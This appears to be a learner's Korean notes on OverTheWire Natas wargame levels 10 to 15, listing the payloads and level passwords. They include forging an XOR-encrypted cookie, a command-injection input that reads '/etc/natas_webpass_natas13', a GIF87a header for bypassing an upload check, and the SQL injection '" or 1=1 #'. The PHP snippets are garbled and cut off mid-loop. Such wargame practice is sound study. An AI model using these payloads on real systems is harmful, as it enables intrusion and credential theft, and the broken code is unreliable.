10 -> 11

PHP에서 showpassword 값이 yes가 되도록 쿠키의 "data" 값을 만들려면, showpassword와 bgcolor 값을 포함한 배열을 만들고, 이 배열을 JSON 형식으로 변환한 뒤, 암호화 및 Base64로 인코딩하면 됩니다.

base64_decode($_COOKIE["data"])를xor연산하고 또 json_decode한 array의 showpassword가 yes여야 함

"no", "bgcolor"=>"#ffffff"); $text = base64_decode("HmYkBwozJw4WNyAAFyB1VUcqOE1JZjUIBis7ABdmbU1GIjEJAyI2TRg%3D"); $outText = json_encode($defaultdata); $key = ''; for($i=0;$i

쿠키의 data를 넣어서 key를 구함
key는 eDWo

"yes", "bgcolor"=>"#ffffff"); $text = json_encode($defaultdata); $outText = ''; $key = 'eDWo'; // Iterate through each character for($i=0;$i

showpassword각 yes가 된 쿠키 값:
HmYkBwozJw4WNyAAFyB1VUVmLgoWZntPRyYwDAooOB1HfndNRiIxCQMiMU0Y

이걸 직접 data 쿠키에 넣어서 새로고침하면

yZdkjAYZRd3R7tq7T5kXMjMJlOIkzDeB

11 -> 12

?data=cat /etc/natas_webpass_natas13
-----다른 방법

trbs5pCjCrkuSknBBKHhaBxq6Wm1j3LC

12 -> 13

GIF87a
z3UYcr4v4uBpeX8f7EZbMHlzK4UR2XtQ

13 -> 14

SdqIqBsFcz3yotlNYErZSZwblkm0lrvx

14 -> 15

" or 1=1 # 입력하니

hPkjKYviLQctEW33QmuXL6eDVfMW4sGo